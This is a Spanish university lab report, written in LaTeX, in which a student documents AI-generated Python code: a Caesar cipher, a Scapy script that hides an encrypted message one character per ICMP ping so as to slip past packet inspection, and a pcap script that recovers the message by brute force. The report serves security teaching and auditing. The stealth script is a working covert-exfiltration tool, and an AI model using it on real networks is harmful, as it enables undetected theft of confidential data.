\documentclass[letter,12pt]{article}
\usepackage[paperheight=27.94cm,paperwidth=21.59cm,bindingoffset=0in,left=3cm,right=2.0cm, top=3.5cm,bottom=2.5cm, headheight=200pt, headsep=1.0\baselineskip]{geometry}
\usepackage{graphicx,lastpage}
\usepackage{upgreek}
\usepackage{censor}
\usepackage[spanish,es-tabla]{babel}
\usepackage{pdfpages}
\usepackage{tabularx}
\usepackage{graphicx}
\usepackage{adjustbox}
\usepackage{xcolor}
\usepackage{colortbl}
\usepackage{rotating}
\usepackage{multirow}
\usepackage[utf8]{inputenc}
\usepackage{float}
\usepackage{listings} % Para bloques de código
\usepackage{framed} % Para los recuadros de las imágenes

\renewcommand{\tablename}{Tabla}
\usepackage{fancyhdr}
\pagestyle{fancy}

% --- Configuración para bloques de código ---
\definecolor{codegreen}{rgb}{0,0.6,0}
\definecolor{codegray}{rgb}{0.5,0.5,0.5}
\definecolor{codepurple}{rgb}{0.58,0,0.82}
\definecolor{backcolour}{rgb}{0.95,0.95,0.92}

\lstdefinestyle{mystyle}{
    backgroundcolor=\color{backcolour},   
    commentstyle=\color{codegreen},
    keywordstyle=\color{magenta},
    numberstyle=\tiny\color{codegray},
    stringstyle=\color{codepurple},
    basicstyle=\footnotesize\ttfamily,
    breakatwhitespace=false,         
    breaklines=true,                 
    captionpos=b,                    
    keepspaces=true,                 
    numbers=left,                    
    numbersep=5pt,                  
    showspaces=false,                
    showstringspaces=false,
    showtabs=false,                  
    tabsize=2
}
\lstset{style=mystyle}

%
\begin{document}
%
    \title{\Huge{Informe Laboratorio 1}}

    \author{\textbf{Sección 1} \\  \\ Matías Tobar \\ e-mail: matias.tobar@mail.udp.cl}
         
    \date{04 Septiembre de 2025}

    \maketitle
    
    \tableofcontents
 
  \newpage
  

\section{Descripción}

\begin{enumerate}
    \item  Usted empieza a trabajar en una empresa tecnológica que se jacta de poseer sistemas que permiten identificar filtraciones de información a través de Deep Packet Inspection (DPI).
    A usted le han encomendado auditar si efectivamente estos sistemas son capaces de detectar las filtraciones a través de tráfico de red. Debido a que el programa \texttt{ping} es ampliamente utilizado desde dentro y hacia fuera de la empresa, su tarea será crear un software que permita replicar tráfico generado por el programa \texttt{ping} con su configuración por defecto, pero con fragmentos de información confidencial. Recuerde que al comparar tráfico real con el generado no debe gatillar alarmas.
    De todas formas, deberá hacer una prueba de concepto, en la cual se demuestre que al conocer el algoritmo, será fácil determinar el mensaje en claro.
    Para los pasos 1,2,3 indicar el texto entregado a IA Generativa y validar si el código resultante cumple con lo requerido.
\end{enumerate}


\section{Actividades}


\subsection{Algoritmo de cifrado}

\begin{enumerate}
\item Generar un programa, en python3 utilizando IA Generativa, que permita cifrar texto utilizando el algoritmo Cesar. Como parámetros de su programa deberá ingresar el string a cifrar y luego el desplazamiento.
\begin{figure}[H]
        \centering
        \includegraphics[width=15cm]{actividades/A1.png}
        \caption{Ejecución del script de la Actividad 1.}
        \label{fig:a1}
\end{figure}


\end{enumerate}

\subsection{Modo stealth}

\begin{enumerate}
    \item Generar un programa, en python3 utilizando IA Generativa, que permita enviar los caracteres del string (el del paso 1) en varios paquetes ICMP request (un caracter por paquete en el campo data de ICMP) para de esta forma no gatillar sospechas sobre la filtración de datos.
Deberá mostrar los campos de un ping real previo y posterior al suyo y demostrar que su tráfico consideró todos los aspectos para pasar desapercibido.
    \begin{figure}[H]
        \centering
        \includegraphics[width=15cm]{actividades/A2.1.png}
        \caption{Captura de Wireshark mostrando los paquetes ICMP generados.}
        \label{fig:a2-1}
    \end{figure}
    El último carácter del mensaje se transmite como una b.
    \begin{figure}[H]
            \centering
            \includegraphics[width=15cm]{actividades/A2.2.png}
            \caption{Detalle del último paquete ICMP con el carácter 'b'.}
            \label{fig:a2-2}
        \end{figure}
\end{enumerate}

\subsection{MitM}
\begin{enumerate}
    \item Generar un programa, en python3 utilizando IA Generativa, que permita obtener el mensaje transmitido en el paso2. Como no se sabe cual es el desplazamiento utilizado, genere todas las combinaciones posibles e imprímalas, indicando en verde la opción más probable de ser el mensaje en claro.
    \begin{figure}[H]
        \centering
        \includegraphics[width=12cm]{actividades/A3.png}
        \caption{Ejecución del script de fuerza bruta.}
        \label{fig:a3}
    \end{figure}
    Finalmente, deberá indicar por que eligió esa IA Generativa en relación a otras del mercado. Comente si tuvo algún problema al momento de generar los códigos.

\end{enumerate}

\newpage

\section{Desarrollo de Actividades}

\subsection{Actividad 1}

Para esta primera actividad, se utilizó una IA Generativa con el siguiente prompt:

\begin{itemize}
    \item Prompt actividad: elabora un programa en python3 que cifre texto con el algoritmo cesar, recibe un string y un desplazamiento k, trabaja solo con letras minúsculas a-z (ascii 97–122) y usa desplazamiento circular (mod 26), deja igual cualquier caracter que no sea a–z, acepta k negativo o mayor a 26 (normaliza con modulo).
\end{itemize}

La IA generó el siguiente script en Python 3 que cumplió con todos los requisitos.

\begin{lstlisting}[language=Python, caption=Código `cesar.py` para la Actividad 1, label=code1]

#!/usr/bin/env python3
from typing import Iterable
import argparse

def cesar(texto: str, k: int) -> str:
    
    k %= 26  # normaliza k para manejar negativos o valores grandes
    res: list[str] = []
    a = ord('a')
    for ch in texto:
        if 'a' <= ch <= 'z':
            desplazada = (ord(ch) - a + k) % 26 + a
            res.append(chr(desplazada))
        else:
            res.append(ch)
    return "".join(res)

def main(argv: Iterable[str] | None = None) -> None:
    parser = argparse.ArgumentParser(
        description="Cifra texto usando el algoritmo César (solo letras a-z, mod 26)."
    )
    parser.add_argument("k", type=int, help="desplazamiento (puede ser negativo o grande)")
    parser.add_argument(
        "texto",
        nargs="+",
        help="texto a cifrar (si tiene espacios, escríbelo entre comillas)"
    )
    args = parser.parse_args(argv)
    texto = " ".join(args.texto)
    print(cesar(texto, args.k))

if __name__ == "__main__":
    main()

\end{lstlisting}

El codigo implementa el cifrado César sólo para a–z con desplazamiento circular (mod 26), dejando intactos otros caracteres. Incluye una pequeña CLI para probar con distintos k.
\begin{figure}
    \centering
    \includegraphics[width=0.8\linewidth]{1cript.png}
    \caption{Resultado de la ejecución del script de cifrado.}
    \label{fig:placeholder}
\end{figure}


\newpage

\subsection{Actividad 2}

Se le proporcionó a la IA el siguiente prompt:
\begin{itemize}
    \item Prompt actividad 2: elabora un programa en python3 que envie un mensaje como varios paquetes icmp echo request (uno por caracter) para que parezca un ping normal, usa scapy, recibe destino (dst), mensaje y desplazamiento k; antes de enviar, cifra el mensaje con el cesar de la actividad 1, cada paquete debe llevar solo 1 byte del mensaje cifrado y el ultimo caracter enviado debe ser siempre 'b', ofrece una cli simple (python stealth\_icmp.py --dst <ip/host> --mensaje "<texto>" --k <int>).

\end{itemize}

El programa resultante, \texttt{stealth\_icmp.py}, utiliza la biblioteca \texttt{scapy}.

\begin{lstlisting}[language=Python, caption=Código `stealth_icmp.py` para la Actividad 2, label=code2]
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import argparse
import os
import sys
import time
import struct
from scapy.all import IP, ICMP, Raw, send

def cesar(texto: str, k: int) -> str:
    """
    Cifra un texto utilizando el algoritmo César.
    """
    k %= 26  # Normaliza k
    res: list[str] = []
    a = ord('a')
    for ch in texto:
        if 'a' <= ch <= 'z':
            desplazada = (ord(ch) - a + k) % 26 + a
            res.append(chr(desplazada))
        else:
            res.append(ch)
    return "".join(res)

def create_stealth_payload(char: str) -> bytes:
    """
    Crea un payload de 48 bytes que imita a un ping estándar.
    - 8 bytes: Timestamp actual.
    - 39 bytes: Patrón estándar.
    - 1 byte: El carácter del mensaje.
    """
    # 8 bytes para el timestamp (long long, 8 bytes)
    timestamp = struct.pack('d', time.time()) # 'd' is a double, 8 bytes

    # 39 bytes de patrón estándar (0x10 a 0x36)
    pattern = bytes(range(0x10, 0x37))[:39]
    
    # 1 byte para el carácter del mensaje
    data_char = char.encode('ascii')
    
    return timestamp + pattern + data_char

def send_stealth_icmp(destination: str, message: str, key: int):
    """
    Cifra un mensaje y lo envía en paquetes ICMP con payload de 48 bytes.
    """
    if os.geteuid() != 0:
        print("Error: Este script requiere privilegios de superusuario (root).", file=sys.stderr)
        sys.exit(1)

    encrypted_message = cesar(message, key)
    print(f"Iniciando envío sigiloso a: {destination}")
    print(f"Mensaje original: '{message}'")
    print(f"Mensaje cifrado (k={key}): '{encrypted_message}'")
    print("-" * 30)

    # Enviar cada caracter del mensaje cifrado
    for char in encrypted_message:
        try:
            payload = create_stealth_payload(char)
            packet = IP(dst=destination) / ICMP() / Raw(load=payload)
            send(packet, verbose=0)
            print(f"Sent 1 packet. (char: '{char}')")
            time.sleep(1)
        except Exception as e:
            print(f"Error al enviar paquete para '{char}': {e}", file=sys.stderr)
            sys.exit(1)

    # Enviar el último caracter 'b'
    try:
        final_payload = create_stealth_payload('b')
        final_packet = IP(dst=destination) / ICMP() / Raw(load=final_payload)
        send(final_packet, verbose=0)
        print("Sent 1 packet. (final char: 'b')")
    except Exception as e:
        print(f"Error al enviar paquete final: {e}", file=sys.stderr)
        sys.exit(1)

    print("-" * 30)
    print("Transmisión completada.")

def main():
    parser = argparse.ArgumentParser(
        description="Envía un mensaje cifrado vía ICMP Echo Requests con payload de 48 bytes."
    )
    parser.add_argument("--dst", required=True, help="IP/host de destino.")
    parser.add_argument("--mensaje", required=True, help="Texto a cifrar y enviar.")
    parser.add_argument("--k", required=True, type=int, help="Desplazamiento para el cifrado César.")
    
    args = parser.parse_args()
    send_stealth_icmp(args.dst, args.mensaje, args.k)

if __name__ == "__main__":
    main()

\end{lstlisting}

El codigo anterior cifra el mensaje con César y lo envía carácter por carácter en ICMP Echo Request, preservando campos típicos de ping y agregando el carácter final 'b'. Muestra mensajes de estado y valida permisos.
\begin{figure}
    \centering
    \includegraphics[width=0.9\linewidth]{2cript.png}
    \caption{Resultado de la ejecución del segundo script.}
    \label{fig:placeholder}
\end{figure}
\begin{figure}
    \centering
    \includegraphics[width=0.8\linewidth]{paqueteOriginal.png}
    \caption{Captura del tráfico generado.}
    \label{fig:placeholder}
\end{figure}
\begin{figure}
    \centering
    \includegraphics[width=0.85\linewidth]{paqueteAct2.png}
    \caption{Detalle del paquete final.}
    \label{fig:placeholder}
\end{figure}


\newpage

\subsection{Actividad 3}

Se utilizó un prompt más detallado para esta actividad:


\begin{itemize}
    \item Prompt actividad 3: elabora un programa en python 3 que lea un archivo pcap y reconstruya un mensaje enviado como icmp echo request (uno por caracter), usa scapy, recibe --pcap y --dst, extrae los echo request hacia ese destino con payload raw de exactamente 1 byte, agrupa por ip.src, icmp.id y elige el flujo con mas paquetes. Ordena por icmp.seq si hay variacion y, si todos los seq son iguales o faltan, ordena por orden de captura, concatena el byte de cada paquete para obtener la cadena cifrada tal como se envio, incluida la 'b' final, luego prueba los 26 desplazamientos usando la funcion de la actividad 1 y muestra todas las opciones con su k y un puntaje simple de idioma (palabras comunes y frecuentes), resalta en verde unicamente la opcion mas probable (si hay empate, prefiere k=0 y luego el menor k), imprime si la última letra reconstruida fue 'b', ofrece una cli simple como 'python3 mitm_bruteforce.py --pcap salida_stealth.pcap --dst <ip/host>', no uses librerias externas aparte de scapy.
\end{itemize}


El script \texttt{mitm\_bruteforce.py} realiza un análisis de un archivo \texttt{.pcap}.

\begin{lstlisting}[language=Python, caption=Código `mitm_bruteforce.py` para la Actividad 3, label=code3]
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import argparse
import sys
import re
from collections import defaultdict
from scapy.all import rdpcap, ICMP, IP, Raw

# --- Colores para salida ---
GREEN = '\033[92m'
RESET = '\033[0m'
YELLOW = '\033[93m'

# Lista simple de palabras comunes en español
PALABRAS_COMUNES_ES = {
    'a','ante','con','de','desde','en','entre','hacia','hasta','para','por','sin','sobre','tras',
    'el','la','los','las','un','una','unos','unas','y','o','u','que','se','es','lo','al','del'
}

def cesar(texto: str, k: int) -> str:
    """Cifra/descifra César. Para descifrar usa k negativo."""
    k %= 26
    a = ord('a')
    out = []
    for ch in texto:
        if 'a' <= ch <= 'z':
            out.append(chr((ord(ch) - a + k) % 26 + a))
        else:
            out.append(ch)
    return "".join(out)

def calculate_score(texto: str) -> int:
    """
    Puntaje simple de plausibilidad del español.
    """
    score = 0
    tokens = re.findall(r"[a-záéíóúñü]+", texto.lower())
    for t in tokens:
        if t in PALABRAS_COMUNES_ES:
            score += 1
    for bg in (" de ", " la ", " el ", " en ", " y "):
        if bg in " " + texto.lower() + " ":
            score += 1
    return score

def process_pcap(pcap_file: str, destination: str):
    print(f"[*] Analizando '{pcap_file}' para Echo Requests de 48 bytes hacia '{destination}'...")

    try:
        packets = rdpcap(pcap_file)
    except Exception as e:
        print(f"Error leyendo PCAP: {e}", file=sys.stderr)
        sys.exit(1)

    candidatos = []
    for idx, pkt in enumerate(packets):
        if not (pkt.haslayer(IP) and pkt[IP].dst == destination and 
                pkt.haslayer(ICMP) and pkt[ICMP].type == 8 and 
                pkt.haslayer(Raw) and len(pkt[Raw].load) == 48):
            continue
        
        try:
            # Extraer el último byte del payload, que contiene el caracter oculto
            ch = pkt[Raw].load[-1:].decode("ascii")
            candidatos.append({
                "idx": idx,
                "time": float(pkt.time),
                "src": pkt[IP].src,
                "id": pkt[ICMP].id,
                "seq": pkt[ICMP].seq,
                "char": ch,
            })
        except (IndexError, UnicodeDecodeError):
            continue

    if not candidatos:
        print("[!] No se encontraron Echo Requests válidos (payload de 48 bytes).")
        return

    print(f"[*] Echo Requests válidos encontrados: {len(candidatos)}")

    grupos = defaultdict(list)
    for item in candidatos:
        grupos[(item["src"], item["id"])].append(item)

    flujo_key, flujo_pkts = max(grupos.items(), key=lambda kv: len(kv[1]))
    print(f"[*] Flujo seleccionado: src={flujo_key[0]}, id={flujo_key[1]} (paquetes: {len(flujo_pkts)})")

    unique_seqs = {p["seq"] for p in flujo_pkts}
    if len(unique_seqs) > 1:
        flujo_pkts.sort(key=lambda p: p["seq"])
    else:
        flujo_pkts.sort(key=lambda p: p["time"])

    reconstruido = "".join(p["char"] for p in flujo_pkts)
    print(f"\n[+] Mensaje cifrado reconstruido ({len(reconstruido)} caracteres):")
    print(f"{YELLOW}{reconstruido}{RESET}")

    ends_b = reconstruido.endswith('b')
    encrypted_message = reconstruido
    if ends_b:
        print("[+] Verificación: último carácter fue 'b'. Se retirará para descifrado.")
        encrypted_message = reconstruido[:-1]
    else:
        print("[!] El último carácter no es 'b'. Se descifrará la cadena completa.")

    print("\n[*] Iniciando fuerza bruta contra César...")
    print("-" * 50)
    
    mejor_k = -1
    mejor_score = -1
    intentos = []

    for k in range(26):
        candidato = cesar(encrypted_message, -k)
        score = calculate_score(candidato)
        intentos.append((k, candidato, score))
        if score > mejor_score:
            mejor_score = score
            mejor_k = k
        elif score == mejor_score:
            if mejor_k != 0 and k == 0:
                mejor_k = 0
            elif k < mejor_k and mejor_k != 0:
                 mejor_k = k


    for k, texto, score in intentos:
        if k == mejor_k:
            print(f"{GREEN}[k={k:2d}] {texto}  (score={score})  << Más probable{RESET}")
        else:
            print(f"[k={k:2d}] {texto}  (score={score})")

    print("-" * 50)

def main():
    ap = argparse.ArgumentParser(description="Reconstruye mensaje ICMP y realiza fuerza bruta César.")
    ap.add_argument("--pcap", required=True, help="Ruta al archivo .pcap")
    ap.add_argument("--dst", required=True, help="IP de destino de los Echo Request")
    args = ap.parse_args()
    process_pcap(args.pcap, args.dst)

if __name__ == "__main__":
    main()

\end{lstlisting}

Este script realiza el análisis del tráfico capturado. Procesa el archivo `.pcap`, filtra los paquetes relevantes basándose en su tamaño y destino, reconstruye la cadena de caracteres, y finalmente aplica un ataque de fuerza bruta con un sistema de puntuación para identificar el mensaje original.

\begin{figure}
    \centering
    \includegraphics[width=0.9\linewidth]{script3.png}
    \caption{Resultado de la ejecución del script de fuerza bruta.}
    \label{fig:placeholder}
\end{figure}


\newpage

\section*{Conclusiones y comentarios}

Para la realización de este laboratorio, partí probando ChatGPT y DeepSeek; me dieron ideas útiles, pero tuve que ajustar varios detalles (especialmente con Scapy y el ordenamiento de paquetes). Finalmente me quedé con Gemini, porque entendió mejor los prompts largos y generó código más estable para este caso, aunque igualmente hice retoques finos (manejo de permisos, orden por icmp.seq, y validaciones del payload). En resumen: la IA acelera el trabajo, pero no reemplaza el criterio: hay que revisar salidas, probar con PCAPs reales y afinar los prompts.

En este laboratorio armé, paso a paso, una prueba de concepto para esconder texto dentro de pings y luego recuperarlo desde una captura. No es “hackeo avanzado”, pero sí enseña que con protocolos comunes y cargas mínimas se puede exfiltrar información si nadie mira con atención los patrones. También confirma lo débil que es César ya que con un ataque de fuerza bruta sencillo recuperé el mensaje sin mayor esfuerzo.

\begin{itemize}
    \item Repositorio de github: https://github.com/matiasts4/Lab-Criptografia
\end{itemize}

\end{document}

